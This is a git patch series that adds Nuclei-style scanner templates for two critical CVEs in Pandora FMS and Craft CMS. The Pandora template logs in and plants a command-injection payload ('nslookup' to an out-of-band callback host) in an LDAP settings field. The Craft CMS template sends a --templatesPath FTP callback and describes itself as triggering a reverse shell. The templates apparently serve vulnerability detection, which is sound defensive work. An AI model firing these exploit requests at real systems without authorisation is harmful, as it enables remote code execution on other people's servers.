From 7ebb7eee317cf4b66a97f7e89638616bffe1dbc9 Mon Sep 17 00:00:00 2001 From: shubhamrooter <147608529+shubhamrooter@users.noreply.github.com> Date: Mon, 2 Dec 2024 15:03:35 +0530 Subject: [PATCH 1/3] Add files via upload --- http/cves/2024/CVE-2024-11320.yaml | 36 ++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2024/CVE-2024-11320.yaml diff --git a/http/cves/2024/CVE-2024-11320.yaml b/http/cves/2024/CVE-2024-11320.yaml new file mode 100644 index 00000000000..79ff39fdca3 --- /dev/null +++ b/http/cves/2024/CVE-2024-11320.yaml @@ -0,0 +1,36 @@ +id: pandora-remote-code-execution-CVE-2024-11320 +info: + name: Pandora v7.0NG.777.3 Remote Code Execution + author: Shubham Rooter + severity: critical + description: | + Exploit for Pandora v7.0NG.777.3 Andromeda that allows remote code execution via LDAP injection in the authentication section. + tags: exploit, rce + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?login=1" + matchers: + - type: word + words: + - 'hidden-csrf_code' + extractors: + - type: regex + name: csrf_token + group: 1 + regex: + - 'name="csrf_code" value="([^"]+)"' + + - method: POST + path: + - "{{BaseURL}}/index.php?login=1" + body: | + nick={{Username}} + &pass={{Password}} + &login_button=Let's+go + &csrf_code={{csrf_token}} + matchers: + - type: word + words: + - 'Valid Session' From 6e4e31ffcfcd8f2074437452f4358631081e264b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 4 Dec 2024 20:19:47 +0530 Subject: [PATCH 2/3] fixing-template --- http/cves/2024/CVE-2024-11320.yaml | 118 ++++++++++++++++++++++------- 1 file changed, 91 insertions(+), 27 deletions(-) diff --git a/http/cves/2024/CVE-2024-11320.yaml b/http/cves/2024/CVE-2024-11320.yaml index 79ff39fdca3..75e012b1c01 100644 --- a/http/cves/2024/CVE-2024-11320.yaml +++ b/http/cves/2024/CVE-2024-11320.yaml @@ -1,36 +1,100 @@ -id: pandora-remote-code-execution-CVE-2024-11320 +id: CVE-2024-11320 + info: - name: Pandora v7.0NG.777.3 Remote Code Execution - author: Shubham Rooter + name: Pandora v7.0NG.777.3 - Remote Code Execution + author: DhiyaneshDK,Shubham Rooter severity: critical description: | - Exploit for Pandora v7.0NG.777.3 Andromeda that allows remote code execution via LDAP injection in the authentication section. - tags: exploit, rce + Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS- from 700 through <=777.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-11320 + cwe-id: CWE-77 + epss-score: 0.00043 + epss-percentile: 0.10436 + cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* + metadata: + vendor: pandorafms + product: pandora_fms + shodan-query: + - http.html:"pandora fms - installation wizard" + - http.title:"pandora fms" + fofa-query: + - body="pandora fms - installation wizard" + - title="pandora fms" + google-query: intitle:"pandora fms" + +flow: http(1) && http(2) && http(3) && http(4) && http(5) + +http: + - raw: + - | + GET /index.php?login=1 HTTP/1.1 + Host: {{Hostname}} -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?login=1" - matchers: - - type: word - words: - - 'hidden-csrf_code' extractors: - type: regex - name: csrf_token + name: csrf_code group: 1 regex: - - 'name="csrf_code" value="([^"]+)"' - - - method: POST - path: - - "{{BaseURL}}/index.php?login=1" - body: | - nick={{Username}} - &pass={{Password}} - &login_button=Let's+go - &csrf_code={{csrf_token}} + - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>' + internal: true + + - raw: + - | + POST /index.php?login=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}} + + matchers: + - type: dsl + dsl: + - status_code == 302 + - contains(set_cookie, 'PHPSESSID=') + condition: and + internal: true + + - raw: + - | + GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains(body, 'Server health') + condition: and + internal: true + + - raw: + - | + GET /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code == 200 + - contains_all(body, 'Authentication method', 'LDAP') + condition: and + internal: true + + - raw: + - | + POST /index.php?sec=general&sec2=godmode/setup/setup§ion=auth HTTP/1.1 + Host: {{Hostname}} + Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup§ion=auth + Content-Type: application/x-www-form-urlencoded + + update_config=1&csrf_code={{csrf_code}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3Bnslookup+{{interactsh-url}}+%23&ldap_admin_pass=test&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local + matchers: - - type: word - words: - - 'Valid Session' + - type: dsl + dsl: + - status_code == 200 + - contains(body,'Correctly updated the setup options') + condition: and From 3429f97e27faa701174302d94c4c0daa1f98280f Mon Sep 17 00:00:00 2001 From: shubhamrooter <147608529+shubhamrooter@users.noreply.github.com> Date: Fri, 20 Dec 2024 12:20:20 +0530 Subject: [PATCH 3/3] Add files via upload --- http/cves/2024/cve-2024-56145.yaml | 57 ++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 http/cves/2024/cve-2024-56145.yaml diff --git a/http/cves/2024/cve-2024-56145.yaml b/http/cves/2024/cve-2024-56145.yaml new file mode 100644 index 00000000000..74f7f0ee134 --- /dev/null +++ b/http/cves/2024/cve-2024-56145.yaml @@ -0,0 +1,57 @@ +id: cve-2024-56145 + +info: + name: Craft CMS Remote Code Execution (RCE) + author: Shubham Rooter + severity: critical + description: | + Craft CMS suffers from a Remote Code Execution (RCE) vulnerability due to improper handling of the `--configPath` parameter. + This template checks if the target is vulnerable and exploits it by triggering a reverse shell. + reference: + - https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms + tags: cve,cve2024,rce,craftcms + +requests: + - method: GET + path: + - "{{BaseURL}}?--configPath=/{{randstr}}" + + matchers-condition: and + matchers: + - type: status + status: + - 503 + + - type: word + words: + - "mkdir()" + part: body + + extractors: + - type: regex + part: body + regex: + - "mkdir\\(\\)" + + - method: GET + path: + - "{{BaseURL}}?--templatesPath=ftp://{{interactsh-url}}" + + payloads: + default: + - "{{interactsh-payload}}" + + attack: pitchfork + threads: 10 + + matchers: + - type: regex + regex: + - "{{interactsh-placeholder}}" + part: interactsh_protocol + + extractors: + - type: regex + part: interactsh_protocol + regex: + - "{{interactsh-placeholder}}"